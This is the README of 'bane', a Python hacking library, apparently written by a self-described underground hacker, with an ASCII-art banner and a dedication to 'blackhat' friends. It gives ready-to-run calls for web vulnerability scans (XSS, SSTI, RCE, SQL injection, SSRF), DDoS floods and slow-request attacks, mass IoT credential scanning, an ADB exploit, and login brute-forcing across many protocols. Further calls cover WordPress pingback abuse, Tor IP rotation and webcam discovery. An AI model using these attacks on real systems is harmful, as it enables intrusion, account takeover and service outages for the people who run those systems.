"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)
.///` `.--::::::---.`` `///.
h-.-s+++/--<br>.---/+o++s:.-h
++..-. `:../s
-+ydm-..: :..-dmho:`
:odmNNNNs..-. `:..+MNNNmmy/. `
.odmNNNNMMMN`..: -..`mMMMMNNNNmy:
+mNNNNMMMMMMMo`.:` :``/MMMMMMMMNNNmy.
.yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:
-dNNNMMMMMMMMMMMN` ..-` `-`- mMMMMMMMMMMMMNNmo
:mNNNMMMMMMMMMMMMM: . `.` -MMMMMMMMMMMMMMNNNs`
/mNNNMMMMMMMMMMMMMMy --- .-- oMMMMMMMMMMMMMMMNNNy`
:mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`
-mNNNNMMMMMMMMMMMMMMMMo`.-` `-.`+MMMMMMMMMMMMMMMMMNNNNo
hNNNNNMMMMMMMMMMMMMMMMm.``- .``.dMMMMMMMMMMMMMMMMMMNNNm-
-NNNNNMMMMMMMMMMMMMMMMMM-..: -<br>NMMMMMMMMMMMMMMMMMMNNNNs
oNNNNNMMMMMMMMMMMMMMMMMMo``.` -` +MMMMMMMMMMMMMMMMMMMNNNNm
:dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.
.ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:. .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+` `
`oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-` `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y: `
+y` dNNNNNNMMMMMMMMMMMMMMMMMMy..-:- --:..oMMMMMMMMMMMMMMMMMMMNNNNNN: -N`
m- hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN: yo `
/d yNNNNNMMh/-````````.-/ydNM.``- -```NNds:.`..-----..-sNMMNNNNN- -m`
h+ sNNNNNMMmsyhddmmmdhs:` `-o/../` `/-.:+-` `:yhddmNNNNmmNMMMNNNNN. d/
m/ oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-. :o++//+yydMMMMMMMMNNNNN` .so
d-- /NNNNNNMMMMMmyhm// ymy.`- o `- odm:- .ddssNMMMMMNNNNNm /:s
.h / :NNNNNNNMMMmhshhy+++ohy/. .: `o` `/``-shysssyddddNMMMMNNNNNNd --.h
-y `: .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy / `d
:s :` dNNNNNMMMMMMMMMNNNmmNNh- `.` `.` `+mMNNNNNMMMMMMMMMMNNNNN+ :` m `
/o /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .: m `
++ `:``dNNNMMMMMMMMMMMNo+/.`./-. o` --` o `-/.``/+omMMMMMMMMMMNNNo .: d` `
-h `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.: -h `
s: `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..: y-
.h `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.-- :y
o/ ` `:``:ymMNh:`- /:-+`o::/` +:/. +:+` /::o./--+ /omMNdo- -- ` h.
`d` `+.` :.` -s: -` ./:::`/::/ +-/. +-+` :::/`-:::- `-`++.``-. `-+ :s
o+ /`-:``.-. `- /--/ /:-: +-/. +-+ :-:+ /--/ .. `--. .:..: h.
`d` :` +h+. - `+-:: .+-:+..-+://-+:+-../:-+-`-:-/. -` -yd. / /s
o+ `:. -ydo. -` //::..o/-:o:.//:/++/:/+.:+/-/+: /::o : :yd+``-- d.
`d .:. -sy .. .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o- `/d+``--`:s
s/ .:` :.:```-o--o.-.:-` `:/ .: /:` `-/ / s:-o-```+``.-` h.
.h -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y
s: -o/::/:--.-.-.: : /`:.---/::+. y-
`h. ``/. `/ ` -.:``` <br><br>..` ```: / ` :` ./. +o
.y. -.-- -.:.``- -```::```: ..`./ : .-.-` /s
.y- -.:```: :/::o+/::/ : ``: : `+o
`s+` -..- -.o/:/: `+::+//:+. -/::o`: ..`-` .s/
:s- ./- `- -.o//o. /:::-::+ `o//o : -` ./.`+o.
`/o:+..+`.` -.://+<br>+--//:-+<br>////`: `../-.ss-
/h /` ..-` .-o/+:..+--//:-+..-o/+:.` `-.- `+ y-
o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s
-o:```.//: :+::+.o--oo:-o.+::+/ :/o.```:o:
-o++oy.: .- /`o::oo:-+-/ -- /o++++o:
`os .. /..//../ ..` `s:
`o+. `:`:-.-. `.++-
`/+/.` `. .` `-++:`
`:+++/:-<br>-:+++/-
`.-::--`
`
INTRODUCTION:
This python library is made for educational purposes only. Me, as the creator and developer, not responsible for any misuse for this module in any malicious activity. It is made as a tool to understand how hackers can create their tools and perform their attacks. It contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing
) and even more ;)
The module can be used as a "codebase" for more sophisticated and advanced scanning tools to help securing websites !! I hope you guys use it wisely and carefully ;)
SPECIAL SPEECH:
This is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in and advantures in this crazy underground world, we have been through a lot together and were close but now he is dead in a hit-and-run :( . he was one of my true cyber bros:
-S0u1 ( https://twitter.com/YourAnonS0u1 ) : programmer and blackhat.
-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engeneering and programmer.
-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.
-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
-Jen Hill.
in the honor of all my people and the memory of my brother zach im sharing all my personal hacking tools with public. plz use them wisely :)
now let's start some tutorials, shall we?
TUTORIALS:
I-INSTALLING THE LIBRARY AND IMPORTING:
if you are using windows , please, first download and install "npcap" from here and restart your computer after that. then install bane.
you can use pip to install bane ( if you are on linux you must run it with "sudo" ) :
pip install bane
pip3 install bane
or you can clone the project's link then run setup.py
git clone https://github.com/AlaBouali/bane
cd bane
python setup.py install
To use it, you have to open the python interpreter from your terminal/cmd (bane can be used only inside the interpreter only after importing it):
python
python3
import bane
II-Usage (General usage or read the wiki ):
Vulnerabilities TESTING:
Automatic XSS scan for website:
xss(
u,
max_pages=5,
pages=[],
payload=None,
email_extension='@gmail.com',
phone_pattern='XXX-XXX-XXXX',
unicode_random_level=0,
number=(1, 9),
js_function="alert",
dont_change={},
predefined_inputs={},
replaceble_parameters={"phpvalue": ((".", ""),)},
file_extension="png",
context_breaker='">',
save_to_file=None,
logs=True,
fill_empty=10,
leave_empty=[],
dont_send=["btnClear"],
proxy=None,
proxies=None,
timeout=10,
user_agent=None,
cookie=None,
debug=False,
mime_type=None,
headers={}
)This function is designed to perform XSS testing on one or more web pages. It scans for XSS vulnerabilities in forms and inputs on the pages.
Parameters:
u: The target URL to test for XSS vulnerabilities.max_pages: Maximum number of pages to scan for XSS (default is 5).pages: List of specific pages to scan (if not provided, it's auto-discovered).payload: The XSS payload to test.email_extension: Email extension for generating email inputs (default is '@gmail.com').phone_pattern: Pattern for generating phone inputs (default is 'XXX-XXX-XXXX').unicode_random_level: Level of Unicode encoding for payload (default is 0).number: Range for generating random numbers (default is between 1 and 9).js_function: JavaScript function to inject (default is "alert").dont_change: A dictionary of parameters not to change during testing.predefined_inputs: A dictionary of predefined inputs for specific parameters.replaceble_parameters: Dictionary mapping parameters to their possible replacements.file_extension: The file extension to use for file inputs (default is "png").context_breaker: Context breaker to insert before payloads (default is '>").save_to_file: If provided, the results will be saved to this file.logs: Boolean to enable or disable logging (default is True).fill_empty: Number of inputs to fill with payload (default is 10).leave_empty: List of inputs not to fill with payloads.dont_send: List of inputs not to send in the request.proxy: A proxy server to use for requests.proxies: List of proxy servers to choose from randomly.timeout: Request timeout in seconds (default is 10).user_agent: User-Agent header to use in requests.cookie: Cookies to include in requests.debug: Boolean to enable or disable debug mode (default is False).mime_type: MIME type for file inputs.headers: Additional headers to include in requests.
Return Value:
The function returns a list of dictionaries, each containing information about XSS testing results on a page.
bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )
SSTI:
Automatic SSTI scan for website:
ssti(
u,
max_pages=5,
pages=[],
email_extension='@gmail.com',
phone_pattern='XXX-XXX-XXXX',
payload_index=0,
values=(9, 123456789),
dont_change={},
number=(1, 9),
payload_keyword="payload",
operator="*",
save_to_file=None,
file_extension="png",
replaceble_parameters={"phpvalue": ((".", ""),)},
logs=True,
fill_empty=10,
leave_empty=[],
dont_send=["btnClear"],
proxy=None,
proxies=None,
timeout=120,
user_agent=None,
cookie=None,
debug=False,
mime_type=None,
predefined_inputs={},
headers={}
)
This function is designed to perform Server-Side Template Injection (SSTI) testing on one or more web pages. It scans for SSTI vulnerabilities in the templates used on the pages.
Parameters:
u: The target URL to test for SSTI vulnerabilities.max_pages: Maximum number of pages to scan for SSTI (default is 5).pages: List of specific pages to scan (if not provided, it's auto-discovered).email_extension: Email extension for generating email inputs (default is '@gmail.com').phone_pattern: Pattern for generating phone inputs (default is 'XXX-XXX-XXXX').payload_index: Index of the payload value in the input (default is 0).values: Range for generating random values (default is between 9 and 123456789).dont_change: A dictionary of parameters not to change during testing.number: Range for generating random numbers (default is between 1 and 9).payload_keyword: The keyword to identify where to inject the payload.operator: The operator to use for payload injection (default is "*").save_to_file: If provided, the results will be saved to this file.file_extension: The file extension to use for file inputs (default is "png").replaceble_parameters: Dictionary mapping parameters to their possible replacements.logs: Boolean to enable or disable logging (default is True).fill_empty: Number of inputs to fill with payload (default is 10).leave_empty: List of inputs not to fill with payloads.dont_send: List of inputs not to send in the request.proxy: A proxy server to use for requests.proxies: List of proxy servers to choose from randomly.timeout: Request timeout in seconds (default is 120).user_agent: User-Agent header to use in requests.cookie: Cookies to include in requests.debug: Boolean to enable or disable debug mode (default is False).mime_type: MIME type for file inputs.headers: Additional headers to include in requests.
Return Value:
The function returns a list of dictionaries, each containing information about SSTI testing results on a page.
bane.ssti(link , timeout=15 )
Remote Command Execution Linux Time-Based:
RCE Testing Function Documentation:
rce(
u,
max_pages=5,
pages=[],
payload_index=0,
email_extension='@gmail.com',
phone_pattern='XXX-XXX-XXXX',
save_to_file=None,
dont_change={},
number=(1, 9),
injection={"code": "php"},
code_operator_right="; ",
code_operator_left="",
command_operator_right="|",
command_operator_left="&",
sql_operator_right="or '",
sql_operator_left="' or ",
file_extension="png",
replaceble_parameters={"phpvalue": ((".", ""),)},
based_on="time",
delay=10,
logs=True,
fill_empty=10,
leave_empty=[],
dont_send=["btnClear"],
proxy=None,
proxies=None,
timeout=120,
user_agent=None,
cookie=None,
debug=False,
mime_type=None,
predefined_inputs={},
headers={}
)This function is designed for Remote Code Execution (RCE) testing on one or more web pages. It scans for RCE vulnerabilities in forms and inputs on the pages.
Parameters:
u: The target URL to test for RCE vulnerabilities.max_pages: Maximum number of pages to scan for RCE (default is 5).pages: List of specific pages to scan (if not provided, it's auto-discovered).payload_index: Index of the payload to use from the payloads dictionary (default is 0).email_extension: Email extension for generating email inputs (default is '@gmail.com').phone_pattern: Pattern for generating phone inputs (default is 'XXX-XXX-XXXX').save_to_file: If provided, the results will be saved to this file.dont_change: A dictionary of parameters not to change during testing.number: Range for generating random numbers (default is between 1 and 9).injection: Dictionary specifying the type of injection and the target language (default is {"code": "php"}).code_operator_right: Right operator for code injection (default is "; ").code_operator_left: Left operator for code injection (default is an empty string).command_operator_right: Right operator for command injection (default is "|").command_operator_left: Left operator for command injection (default is "&").sql_operator_right: Right operator for SQL injection (default is "or '").sql_operator_left: Left operator for SQL injection (default is "' or ").file_extension: The file extension to use for file inputs (default is "png").replaceble_parameters: Dictionary mapping parameters to their possible replacements.based_on: The basis for time-based attacks ("time" or "file") (default is "time").delay: Delay in seconds for time-based attacks (default is 10).logs: Boolean to enable or disable logging (default is True).fill_empty: Number of inputs to fill with payload (default is 10).leave_empty: List of inputs not to fill with payloads.dont_send: List of inputs not to send in the request.proxy: A proxy server to use for requests.proxies: List of proxy servers to choose from randomly.timeout: Request timeout in seconds (default is 120).user_agent: User-Agent header to use in requests.cookie: Cookies to include in requests.debug: Boolean to enable or disable debug mode (default is False).mime_type: MIME type for file inputs.predefined_inputs: A dictionary of predefined inputs for specific parameters.headers: Additional headers to include in requests.
Return Value:
The function returns a list of dictionaries, each containing information about RCE testing results on a page.
bane.rce(link ,injection={"command":"linux"},based_on='time', timeout=15 )
Remote Command Execution Linux File-Based:
bane.rce(link ,injection={"command":"linux"},based_on='file', timeout=15 )
Remote Command Execution Windows Time-Based:
bane.rce(link ,injection={"command":"windows"},based_on='time', timeout=15 )
Remote Command Execution Windows File-Based:
bane.rce(link ,injection={"command":"windows"},based_on='file', timeout=15 )
Remote Code Execution PHP Time-Based:
bane.rce(link ,injection={"code":"php"},based_on='time', timeout=15 )
Remote Code Execution PHP File-Based:
bane.rce(link ,injection={"code":"php"},based_on='file', timeout=15 )
Remote Code Execution PYTHON Time-Based:
bane.rce(link ,injection={"code":"python"},based_on='time', timeout=15 )
Remote Code Execution PYTHON File-Based:
bane.rce(link ,injection={"code":"python"},based_on='file', timeout=15 )
Remote Code Execution PERL Time-Based:
bane.rce(link ,injection={"code":"perl"},based_on='time', timeout=15 )
Remote Code Execution PERL File-Based:
bane.rce(link ,injection={"code":"perl"},based_on='file', timeout=15 )
Remote Code Execution RUBY Time-Based:
bane.rce(link ,injection={"code":"ruby"},based_on='time', timeout=15 )
Remote Code Execution RUBY File-Based:
bane.rce(link ,injection={"code":"ruby"},based_on='file', timeout=15 )
Remote Code Execution NODEJS Time-Based:
bane.rce(link ,injection={"code":"nodejs"},based_on='time', timeout=15 )
Remote Code Execution NODEJS File-Based:
bane.rce(link ,injection={"code":"nodejs"},based_on='file', timeout=15 )
SQL-Injection Time-Based:
bane.rce(link ,injection={"sql":"mysql"}, timeout=15 )#test for MySQL
SQL-Injection Time-Based:
bane.rce(link ,injection={"sql":"oracle"}, timeout=15 )#test for Oracle
SQL-Injection Time-Based:
bane.rce(link ,injection={"sql":"postgre"}, timeout=15 )#test for Postgre
SQL-Injection Time-Based:
bane.rce(link ,injection={"sql":"sql_server"}, timeout=15 )#test for SQL Server
Path traversal:
Path Traversal Vulnerability Scanner
path_traversal(
u,
max_pages=5,
logs=True,
null_byte=False,
bypass=False,
target_os="linux",
php_wrapper=None,
proxy=None,
proxies=None,
timeout=10,
user_agent=None,
cookie=None,
pages=[],
headers={}
)
This function is designed to perform Path Traversal vulnerability testing on one or more web pages. It scans for Path Traversal vulnerabilities in URLs and their associated files on the server.
Parameters:
u: The target URL to test for Path Traversal vulnerabilities.max_pages: Maximum number of pages to scan for vulnerabilities (default is 5).logs: Boolean to enable or disable logging (default is True).null_byte: Include null byte (%00) in the path (default is False).bypass: Bypass security measures by adding extra slashes (default is False).target_os: Target operating system ("linux" or "windows," default is "linux").php_wrapper: Prefix to be added before the traversal path (e.g., "file").proxy: A proxy server to use for requests.proxies: List of proxy servers to choose from randomly.timeout: Request timeout in seconds (default is 10).user_agent: User-Agent header to use in requests.cookie: Cookies to include in requests.pages: List of specific pages to scan (if not provided, it's auto-discovered).headers: Additional headers to include in requests.
Return Value:
The function returns a list of dictionaries, each containing information about Path Traversal testing results on a page. Each dictionary includes a Boolean value indicating whether a vulnerability was found and the URL where the vulnerability was detected.
bane.path_traversal(link, timeout=15 )
SSRF:
Server-Side Request Forgery (SSRF) Scanner
ssrf(
u,
max_pages=5,
logs=True,
null_byte=False,
link="http://www.google.com",
timeout=120,
signature="<title>Google</title>",
proxy=None,
proxies=None,
user_agent=None,
cookie=None,
pages=[],
headers={}
)This function is designed to perform Server-Side Request Forgery (SSRF) vulnerability testing on one or more web pages. It scans for SSRF vulnerabilities in the target URL and its parameters.
Parameters:
u: The target URL to test for SSRF vulnerabilities.max_pages: Maximum number of pages to scan for SSRF (default is 5).logs: Boolean to enable or disable logging (default is True).null_byte: Boolean to append a null byte character ("%00") to the URL (default is False).link: The link to be used in SSRF checks (default is "http://www.google.com").timeout: Request timeout in seconds (default is 120).signature: The HTML signature to check in the response (default is "<title>Google</title>").proxy: A proxy server to use for requests.proxies: List of proxy servers to choose from randomly.user_agent: User-Agent header to use in requests.cookie: Cookies to include in requests.pages: List of specific pages to scan (if not provided, it's auto-discovered).headers: Additional headers to include in requests.
Return Value:
The function returns a list of dictionaries, each containing information about SSRF testing results on a page. Each dictionary contains a boolean indicating whether an SSRF vulnerability was found and the URL where it was detected.
bane.ssrf(link )
CR/LF Injection Testing Functions
crlf_unicode_encode(
random_level=0,
line_feed_only=False,
carriage_return_only=False
)
This function is designed to generate CR/LF (Carriage Return / Line Feed) characters for use in HTTP request parameters. CR/LF injection is a web security vulnerability that can lead to various attacks.
Parameters:
random_level: An integer representing the level of randomness in character selection (default is 0). - Level 0: Always returns "%0d%0a". - Level 1: Randomly selects between "%E5%98%8D%0a" and "%0d%E5%98%8A". - Level 2: Always returns "%E5%98%8D%E5%98%8A".line_feed_only: A boolean flag indicating whether to return only the line feed character (default is False).carriage_return_only: A boolean flag indicating whether to return only the carriage return character (default is False).
crlf_header_injection(
u,
unicode_random_level=0,
carriage_return_only=False,
line_feed_only=False,
proxy=None,
timeout=10,
user_agent=None,
cookie=None,
debug=False,
headers={}
)
This function is designed to test for CR/LF injection vulnerabilities in HTTP headers of a given URL.
Parameters:
u: The target URL to test for CR/LF injection vulnerabilities.unicode_random_level: Level of Unicode encoding for the CR/LF characters (default is 0).carriage_return_only: A boolean flag indicating whether to use only carriage return character (default is False).line_feed_only: A boolean flag indicating whether to use only line feed character (default is False).proxy: A proxy server to use for requests.timeout: Request timeout in seconds (default is 10).user_agent: User-Agent header to use in requests.cookie: Cookies to include in requests.debug: Boolean to enable or disable debug mode (default is False).headers: Additional headers to include in requests.
Return Value:
The function returns True if it finds the string "banetest" in the response headers; otherwise, it returns False.
CRLF header injection:
bane.crlf_header_injection(link, timeout=15 )
CRLF body injection:
crlf_body_injection(
u,
proxy=None,
unicode_random_level=0,
carriage_return_only=False,
line_feed_only=False,
timeout=10,
user_agent=None,
cookie=None,
debug=False,
headers={}
)
This function is designed to test for CR/LF injection vulnerabilities in the body of a web page's response.
Parameters:
u: The target URL to test for CR/LF injection vulnerabilities.proxy: A proxy server to use for requests.unicode_random_level: Level of Unicode encoding for the CR/LF characters (default is 0).carriage_return_only: A boolean flag indicating whether to use only the carriage return character (default is False).line_feed_only: A boolean flag indicating whether to use only the line feed character (default is False).timeout: Request timeout in seconds (default is 10).user_agent: User-Agent header to use in requests.cookie: Cookies to include in requests.debug: Boolean to enable or disable debug mode (default is False).headers: Additional headers to include in requests.
Return Value:
The function returns True if it finds the string "banetest;$@*" in the response text; otherwise, it returns False.
bane.crlf_body_injection(link, timeout=15 )
Clickjacking:
bane.page_clickjacking(link, timeout=15 )
CORS Misconfigurations:
bane.cors_misconfigurations(link, timeout=15 )
CSRF:
cookie="session=fgyujikop"#just an example of cookie sinceit requires a session
bane.csrf(link, timeout=15 , cookie=cookie )
File upload:
bane.file_upload(link, timeout=15 )
Android Debug Bridge (ADB) exploit:
bane.adb_exploit(IP , timeout=5 )
Exposed unauthenticated Telnet server:
bane.exposed_telnet(IP , timeout=5 )
Exposed "/.env" File:
bane.exposed_env(link , timeout=15 )
Exposed "/.git" File:
bane.exposed_git(link , timeout=15 )
Sniffable links via network:
bane.interceptable_links(link , timeout=15 )
Springboot actuator:
bane.springboot_actuator(link , timeout=15 )
Vulners API Search for known vulnerabilities on a particular software:
bane.vulners_search("wordpress",version="4.7.4")#just an example
PHPUNIT exploit:
bane.phpunit_exploit(link , timeout=15 )
Shodan report:
api_key="ghbjklmjklmjlkml...."
bane.shodan_report(IP , api_key)
DDoS:
UDP FLOOD:
bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)
TCP FLOOD:
bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)
HTTP FLOOD:
bane.http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):
bane.prox_http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
Torshammer attack:
bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)
Torshammer attack but through proxies instead of Tor:
bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)
R.U.D.Y attack:
bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")
Xerxes attack:
bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )
Xerxes attack through proxies:
bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )
Slow read attack:
bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Backend technologies scan:
bane.scan_backend_technology(link , timeout=15 )
CMS testing:
WordPress scan:
bane.get_wp_infos(link , timeout=15 )
Drupal scan:
bane.get_drupal_infos(link , timeout=15 )
Joomla scan:
bane.get_joomla_infos(link , timeout=15 )
Magento scan:
bane.get_magento_infos(link , timeout=15 )
WordPress testing:
Users list:
bane.wp_users(link , timeout=15 )
User's details:
bane.wp_user(link , user=1 , timeout=15 )
All xmlrpc's available functions:
bane.wp_xmlrpc_methods(link , timeout=15 )
Check if it's possible to performe BruteForce attack through xmlrpc:
bane.wp_xmlrpc_bruteforce(link , timeout=15 )
Check if it's possible to performe Mass BruteForce attack through xmlrpc:
bane.wp_xmlrpc_mass_bruteforce(link , timeout=15 )
Check a Login Combo:
bane.wpadmin(link , username , password , timeout=15 )
Check Multiple Login Combo at once:
bane.wpadmin_mass(link , word_list=["admin:123","admin:HGJJK","admin:HJKL","admin:%MLK"] , timeout=15 )
Check if it's possible to performe PingBack attack through xmlrpc:
bane.wp_xmlrpc_pingback(link , timeout=15 )
Performe PingBack attack through xmlrpc:
bane.wp_xmlrpc_pingback(link , target_url="https://www.example.com" , timeout=15 )
Check if it's possible to performe BruteForce attack through xmlrpc:
bane.wp_xmlrpc_bruteforce(link , timeout=15 )
Users Enumeration:
bane.wp_users_enumeration(link , timeout=15 )
WordPress version:
bane.wp_version(link , timeout=15 )
Proxies collecting:
HTTP proxies gathering:
bane.proxyscrape()
SOCKS4 proxies gathering:
bane.proxyscrape(protocol="socks4")
SOCKS5 proxies gathering:
bane.proxyscrape(protocol="socks5")
Checking proxy:
bane.proxy_check(IP , port , proto="http" , timeout=5)
IoTs mass scanning:
Mass ssh scanning: (if you are on Windows OS, please install Putty)
bane.mass_scan(threads=100 , protocol="ssh" , word_list= ["root:root","admin:admin"] )
Mass telnet scanning:
bane.mass_scan(threads=100 , protocol="telnet" , word_list= ["root:root","admin:admin"] )
Mass ftp scanning:
bane.mass_scan(threads=100 , protocol="ftp" , word_list= ["root:root","admin:admin"] )
Mass MySQL scanning:
bane.mass_scan(threads=100 , protocol="mysql" , word_list= ["root:root","admin:admin"] )
Mass Android Debug Bridge (ADB) exploit:
bane.mass_scan(threads=100 , protocol="adb" )
Extract information from page:
Parse all forms in the page:
bane.forms_parser(link , timeout=10 )
Get all page inputs and their values:
bane.inputs(link , value=True , timeout=10 )
Get all page forms and their values:
bane.forms(link , value=True , timeout=10 )
Get login form:
bane.loginform(link , value=True , timeout=10 )
Get all links on the page:
bane.crawl(link , timeout=10 )
Get all paths on the page:
bane.pather(link , timeout=10 )
Get all social media and external links on the page:
bane.media(link , timeout=10 )
Get all subdomains links on the page:
bane.subdomains_extract(link , timeout=10 )
Information gathering:
Get banner:
bane.get_banner(IP , p=port , payload=None , timeout=5 )
Get infomation about Domain or IP:
bane.info(IP , timeout=15 )
safeweb.norton.com report for a link:
bane.norton_rate(link , timeout=15 )
Your IP address:
bane.myip()
WHOIS:
bane.whois( domain )
GEO-Information for any IP:
bane.geoip( IP )
HTTP headers:
bane.headers( link )
Reverse IP Lookup:
bane.reverse_ip_lookup( IP )
Resolve any domain using a specific DNS server:
bane.resolve( domain , server="8.8.8.8" )
Very Fast port scan:
bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 ).result
Subdomains finder:
bane.get_subdomains( domain )
Extract sensitive data from Javascript files and code embeded in the page:
bane.examine_js_code( url )
Encryption & Hashing:
XOR:
bane.xor_string( data, key )
Caesar:
bane.caesar_string( data, key )
MD5:
bane.md5_string( data )
SHA1:
bane.sha1_string( data )
SHA224:
bane.sha224_string( data )
SHA256:
bane.sha256_string( data )
SHA384:
bane.sha384_string( data )
SHA512:
bane.sha512_string( data )
Base64 encoding:
bane.base64_encode( data )
Base64 decoding:
bane.base64_decode( data )
File content encryption with XOR:
bane.xor_file( file , key )
File content encryption with MD5:
bane.md5_file( file )
File content encryption with SHA1:
bane.sha1_file( file )
File content encryption with SHA224:
bane.sha224_file( file )
File content encryption with SHA256:
bane.sha256_file( file )
File content encryption with SHA384:
bane.sha384_file( file )
File content encryption with SHA512:
bane.sha512_file( file )
File content encoding with base64:
bane.base64_encode_file( file )
File content decoding with base64:
bane.base64_decode_file( file )
Decryption:
MD5:
bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )
SHA1:
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )
SHA224:
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )
SHA256:
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )
SHA384:
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )
SHA512:
bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )
Base64:
bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_string=True )
Caesar:
bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )
Bruteforcing:
Admin login form on web page:
bane.web_login_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
Bruteforce HTTP authentication login:
bane.http_auth_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
FTP server:
bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SSH server: (if you are on windows, please install Putty)
bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )
TELNET server:
bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SMTP server:
bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)
MySQL server:
bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )
WordPress login page:
bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )
Admin panel finder:
bane.admin_panel_finder(link , ext="php" , timeout=15 )
Force browsing pages on admin panel:
bane.force_browsing(link , ext="php" , timeout=15 )
Filemanager finder:
bane.filemanager_finder(link , ext="php" , timeout=15 )
Amplification factors calculation for some protocols:
DNS:
bane.dns_factor( IP , timeout=3 )
NTP:
bane.ntp_factor( IP , timeout=3 )
Memcache:
bane.memcache_factor( IP , timeout=3 )
Chargen:
bane.chargen_factor( IP , timeout=3 )
SSDP:
bane.ssdp_factor( IP , timeout=3 )
SNMP:
bane.snmp_factor( IP , timeout=3 )
ECHO:
bane.echo_factor( IP , timeout=3 )
Tor IP switching:
Without password: (doesn't work with Windows OS)
bane.tor_switch_no_password( interval=30 , logs=True )
Without password: (doesn't work with Windows OS)
bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)
Updating bane:
bane.update(version=None)
Some extra useful functions:
Clear a file:
bane.clear_file( file )
Create a file:
bane.create_file( file )
Delete a file:
bane.delete_file( file )
Get content of a file:
bane.read_file( file )
Get CloudFlare cookie: (you must install NodeJS first)
bane.get_cf_cookie( domain , user_agent )
Get HTB invitation:
bane.HTB_invitation()
Get Facebook account's ID:
bane.facebook_id( fb_link )
Google dorking:
bane.google_dorking( dork )
Webhint report's link:
bane.webhint_report( link )
Youtube search:
bane.youtube_search( query )
Write to a file:
bane.write_file( data , file )
Find webcams:
bane.webcams( count=10 , by={'country':'us'} )
bane.webcams( count=10 , by={'type':'axis'} )
bane.webcams( count=10 , by={'city':'paris'} )
bane.webcams( count=10 , by={'timezone':'+00:00'} )